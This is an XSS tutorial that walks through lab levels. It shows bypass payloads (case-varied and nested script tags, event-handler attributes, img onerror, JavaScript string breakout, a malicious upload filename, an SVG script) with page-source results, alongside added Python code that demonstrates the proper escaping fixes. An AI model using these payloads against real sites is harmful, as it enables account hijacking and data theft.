Cross Site Scripting


Example- 01:
The first example gets an alert box using a basic payload.
We can just use <script> alert(1) </script> to get a popup.

Example- 02:
Now the developer noticed the vulnerability. He fixed it using a regular
expression. If you try the previous payload and look at the ‘page source’, you
will notice that the <script> tag is stripped from the source code. In this
scenario many of us think that no XSS is possible. But it is possible. If we
modify our payload to

<scRipt> alert(1) </scrIpt>

the XSS will be executed. We can change any of the letters to uppercase. We can
even try <SCRIPT> alert(1) </SCRIPT>

If we put <script>alert(1)</script> and view the ‘page source’, it will look
something like this:

<div class="row">
<div class="col-lg-12">
<h1>XSS 02</h1>
<p>Welcome
noob mehedi;alert(1)!</p>
</div>
</div>

But if we put <Script>alert(1)</scRipt>, this will pop up our alert:

<div class="row">
<div class="col-lg-12">
<h1>XSS 02</h1>
<p>Welcome
noob mehedi;<Script>alert(1)</scRipt>!</p>
</div>
</div>

Example- 03:
This time the developer noticed our previous bypass, so he added some more
filtering. If we try our previous payload it will be stripped as well. So we need
to find an alternative.

This time the developer implemented code where every <script> tag is stripped,
no matter how you write the <script> tag. So what can we do?

If we try ( test<script>test ) what will happen?

We will see in the ‘page source’ that <script> is stripped and testtest exists in
the source code. This gives a good indication about our bypass. Now what if we
try <scrscriptipt> ?

script will definitely be stripped, but after stripping script we are left with
another <script> (<scr….ipt> becomes <script> ). This will execute our XSS. So our
payload is

<scrscriptipt> alert(1) </scrscriptipt>

which will be turned into <script>alert(1)</script>

When we give only <script>alert(1)</script> the <script> tag will be stripped:

<div class="row">
<div class="col-lg-12">
<h1>XSS 03</h1>
<p>Welcome
noob mehedi; alert(1)!</p>

</div>
</div>

But if we input <scrscriptipt>alert(1)</scrscriptipt>

<div class="row">
<div class="col-lg-12">
<h1>XSS 03</h1>
<p>Welcome
noob mehedi; <script>alert(1)</script>!</p>

</div>
</div>

Example- 04:

This time the developer made sure that whenever there is a <script> tag it is
stripped. But there are other ways to execute JavaScript.

We can use the following payloads to execute JavaScript.

We can use onmouseover, onmouseout, onmousemove and onclick. It’s good to use
them within an <a> tag, because when you use them with an <a> tag like this:
<a onmouseover = 'alert(1)' > Test </a>

the text ‘Test’ will be shown in the browser as a link, because we used the <a>
tag.

Now when we put our mouse on Test, we get a popup. So the benefit of using the
<a> tag is that we can be pretty sure where we should put or move our mouse to
execute our payload.

Some other payloads which we can use with the <a> tag:

<a onmouseout = 'alert(1)' > Test </a> will execute when we move our mouse off
Test.
<a onmousemove = 'alert(1)' > Test </a> will execute when we move our mouse over
Test.
<a onclick = 'alert(1)' > Test </a> will execute when we click on Test.

You can also use javascript:alert(1) with both the <a> tag and the <img> tag.

Another common payload used to bypass filters is

<img src='mehedi' onerror='alert(1)' />

It executes when the img src gets an error. Here the image source is invalid, so
it gets an error and executes onerror.

We can also use onmouseover, onmouseout, onmousemove and onclick with the <div>
tag. But you need to write your payload based on the source code (read part 1).
This is not only for the <div> tag: you need to look at the page source every
time you write a payload.
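The server-side filters in Examples 02 to 04 are never shown, so here is an added example (not from the original document) that reconstructs each filter as the page-source results describe it and sets them beside the fix a defender would ship: encoding the output for the HTML text context. The regular expressions and the use of Python are assumptions that reproduce the observed behaviour.

```python
import html
import re

# Example 02 (assumed reconstruction): literal, case-sensitive removal of the
# opening and closing tags, so any change of letter case slips through.
def filter_case_sensitive(user_input: str) -> str:
    return user_input.replace("<script>", "").replace("</script>", "")

# Example 03 (assumed reconstruction): one case-insensitive pass that deletes
# the word "script" together with a surrounding "<", "</" or ">". It turns
# "test<script>test" into "testtest", and <scrscriptipt> into <script>.
_SCRIPT_WORD = re.compile(r"<?/?script>?", re.IGNORECASE)

def filter_single_pass(user_input: str) -> str:
    return _SCRIPT_WORD.sub("", user_input)

# Example 04 (assumed reconstruction): every <script> tag is removed whatever
# its spelling, but event handler attributes on other tags are never examined.
_SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)

def filter_script_tag(user_input: str) -> str:
    return _SCRIPT_TAG.sub("", user_input)

# The fix: encode for the context instead of hunting for bad substrings.
# Every "<", ">", "&" and quote becomes an entity, so no markup the user typed
# survives, regardless of casing, nesting or which tag carries the handler.
def render_welcome(user_input: str) -> str:
    return "<p>Welcome " + html.escape(user_input, quote=True) + "!</p>"

def contains_markup(rendered: str) -> bool:
    # True if an angle bracket survived inside the user-controlled part.
    inner = rendered[len("<p>Welcome "):-len("!</p>")]
    return "<" in inner or ">" in inner
```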

Example- 05:
This time the developer just tried to prevent the <script> tag. The developer
implemented the code in such a way that whatever input the user gives, it is
echoed back inside a <script> tag.

Didn't get it? Ok, just remember the <script> tag is already given in the page
source, like this:

<script>
// User input goes here whatever he gives input
</script>

Suppose the user entered <script>alert(1)</script>. This will show in the page
source like this:

<script>
<script>alert(1)</script>
</script>

If the input is assigned to a variable, it lands inside that variable. Suppose our variable is $x:

<script>
var $x = "<script>alert(1)</script>";
</script>

So this will not execute. We need to use our payload without the <script> tag,
because <script> is already there. We need to modify our payload according to
the page source. If it's not in a variable we can simply put alert(1) to get a popup.

<div class="row">
<div class="col-lg-12">
<h1>XSS 06</h1>
<p>Welcome!
<script>
var $a= "noob mehedi"
</script>
</p>
</div>
</div>

After inputting a double quote (") :

<div class="row">
<div class="col-lg-12">
<h1>XSS 06</h1>
<p>Welcome!
<script>
var $a= "noob mehedi"";
</script>
</p>
</div>
</div>

Now we need to handle this properly. If we enter a ; this will look like this:

<div class="row">
<div class="col-lg-12">
<h1>XSS 06</h1>
<p>Welcome!

<script>
var $a= "noob mehedi";";
</script>
</p>
</div>
</div>

Now if we input another variable to balance this: "; var $b="

<div class="row">
<div class="col-lg-12">
<h1>XSS 06</h1>
<p>Welcome!
<script>
var $a= "noob mehedi"; var $b="";
</script>
</p>
</div>
</div>

Now we can get our popup by putting alert between var $a and var $b:

<div class="row">
<div class="col-lg-12">
<h1>XSS 06</h1>
<p>Welcome!
<script>
var $a= "noob mehedi"; alert(1); var $b="";
</script>
</p>
</div>
</div>
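For Example 05 the fix is different from the earlier ones: the data sits inside a JavaScript string, so HTML entity encoding is the wrong tool. The added example below (not part of the original document) renders the same var $a = "..." template unsafely and safely and counts how many statements the rendering contains; the template, the Python rendering and the statement counter are constructed for this illustration.

```python
import json

# Constructed template modelling the page source in Example 05: the value is
# placed inside a JavaScript string inside an existing <script> block.
TEMPLATE = "<script>\nvar $a = {value};\n</script>"

# Vulnerable rendering as the walkthrough describes it: the raw input is
# dropped between two double quotes, so a quote in the input ends the string.
def render_unsafe(user_input: str) -> str:
    return TEMPLATE.format(value='"' + user_input + '"')

# Fix: emit a JavaScript string literal. json.dumps escapes quotes, backslashes
# and control characters; "<", ">" and "&" are additionally written as \uXXXX
# so the HTML parser can never see a "</script>" inside the block.
def js_string_literal(user_input: str) -> str:
    literal = json.dumps(user_input)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))

def render_safe(user_input: str) -> str:
    return TEMPLATE.format(value=js_string_literal(user_input))

# Check helper: count ";" outside double-quoted string literals, honouring
# backslash escapes. The template holds one assignment, so a rendering with
# more than one top-level ";" means the input broke out of the string.
def top_level_semicolons(rendered: str) -> int:
    count, in_string, escaped = 0, False, False
    for ch in rendered:
        if in_string:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch == ";":
            count += 1
    return count
```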

XSS via file upload:
Rename your file with your payload. You can use Burp Suite. First upload your
file to the website. In Burp Suite, capture the request and rename the file with
your payload. Then forward the request. An example file name is given below:
"><img src=x onerror=alert(1)>.png

XSS via svg:

Sometimes the source code echoes the metadata. In this case we can try XSS via
SVG. Again, upload an SVG image file and capture the request in Burp Suite. We
will see the metadata of our file in the request body. Replace the metadata with
your XML payload. A payload example is given below:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
alert(1);
</script>
</svg>
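On the defending side, an uploaded SVG can be inspected before it is ever served inline. The following added example (not from the original document) parses the upload with the standard library and reports script elements, event handler attributes and javascript: URLs; the sample documents are constructed, and the DOCTYPE from the payload above is left out.

```python
import xml.etree.ElementTree as ET

# Constructed samples (not real uploads): the walkthrough's SVG payload
# without its DOCTYPE, and a harmless image for comparison.
MALICIOUS_SVG = """<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
alert(1);
</script>
</svg>"""

CLEAN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
<circle cx="5" cy="5" r="4" fill="red"/>
</svg>"""

def _local_name(qualified: str) -> str:
    # ElementTree reports namespaced names as "{uri}name"; keep only "name".
    return qualified.rsplit("}", 1)[-1].lower()

def svg_findings(svg_text: str) -> list:
    """Return the reasons this SVG must not be served inline (empty if none).

    Flags <script> elements in any namespace, on* event handler attributes
    and javascript: URLs in href / xlink:href attributes.
    """
    root = ET.fromstring(svg_text.encode("utf-8"))
    findings = []
    for elem in root.iter():
        if _local_name(elem.tag) == "script":
            findings.append("script element")
        for name, value in elem.attrib.items():
            attr = _local_name(name)
            if attr.startswith("on"):
                findings.append("event handler attribute " + attr)
            elif attr == "href" and value.strip().lower().startswith("javascript:"):
                findings.append("javascript: URL in " + attr)
    return findings

def is_safe_svg(svg_text: str) -> bool:
    try:
        return not svg_findings(svg_text)
    except ET.ParseError:
        return False  # malformed XML is rejected as well
```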
